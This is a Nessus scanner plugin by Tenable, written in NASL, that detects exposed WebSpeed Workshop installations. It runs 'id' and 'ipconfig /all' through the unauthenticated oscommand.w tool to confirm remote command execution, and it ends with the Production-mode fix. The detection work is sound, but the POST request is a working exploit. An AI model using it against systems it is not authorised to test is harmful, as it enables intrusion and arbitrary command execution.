#
#  (C) Tenable Network Security, Inc.
#


 desc = "
Synopsis :

The remote web server hosts an application that allows for arbitrary
command execution. 

Description :

The remote web server appears to be using WebSpeed, a website creation
language used with database-driven websites. 

The installation of WebSpeed on the remote host is configured to
operate in 'Development' mode and allows access to the WebSpeed
Workshop, an environment intended for developing Web-based Internet
Transaction Processing applications.  The Workshop environment allows
for unauthenticated access to a number of tools, including one for
executing arbitrary commands on the remote host subject to the
privileges of the web server user id. 

See also :

http://www.psdn.com/library/servlet/KbServlet/download/1107-102-926/wpb.pdf

Solution :

Change WebSpeed's Agent Application Mode to 'Production'. 

Risk factor : 

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25088);
  script_version("$Revision: 1.2 $");

  script_name(english:"WebSpeed Workshop Command Execution");
  script_summary(english:"Tries to execute a command using WebSpeed Workshop"); 
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Loop through various directories.
if (thorough_tests) dirs = make_list("/scripts", "/cgi-public", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Loop over various standard WebSpeed Messenger scripts.
  foreach msgr (make_list("cgiip.exe", "wsisa.dll", "wsasp.dll", "wsnsa.dll", "wspd_cgi.sh"))
  {
    # See whether we can access the oscommand webtool.
    uri = string(dir, "/", msgr, "/WService=wsbroker1/webtools/oscommand.w");
    req = http_get(item:uri, port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # If so...
    if ("<TITLE>WebSpeed OS Command</TITLE>" >< res)
    {
      # Try to run a command.
      cmds = make_list("id", "ipconfig /all");
      foreach cmd (cmds)
      {
        postdata = string(
          "CODE=", urlencode(str:cmd), "&",
          "Run=Submit"
        );

        referer = string("://", get_host_name(), uri);
        if (ENCAPS_IP >= ENCAPS_SSLv23) referer = "https" + referer;
        else referer = "http" + referer;

        req = string(
          "POST ", uri, " HTTP/1.1\r\n",
          "Host: ", get_host_name(), "\r\n",
          "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
          "Referer: ", referer, "\r\n",
          "Content-Type: application/x-www-form-urlencoded\r\n",
          "Content-Length: ", strlen(postdata), "\r\n",
          "\r\n",
          postdata
        );
        res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res == NULL) exit(0);

        # There's a problem if our command ran.
        if (
          "<PRE>" >< res && "</PRE>" >< res &&
          (
            (cmd == "id" && egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res)) ||
            ("ipconfig" >< cmd && "Windows IP Configuration" >< res)
          )
        )
        {
          output = strstr(res, "<PRE>") - "<PRE>";
          output = output - strstr(output, "</PRE>");

          report = string(
            desc,
            "\n\n",
            "Plugin output :\n",
            "\n",
            "Nessus was able to execute the command '", cmd, "' on the remote\n",
            "host, which produced the following output :\n",
            "\n",
            output
          );
          security_hole(port:port, data:report);
          exit(0);
        }
      }
    }
  }
}
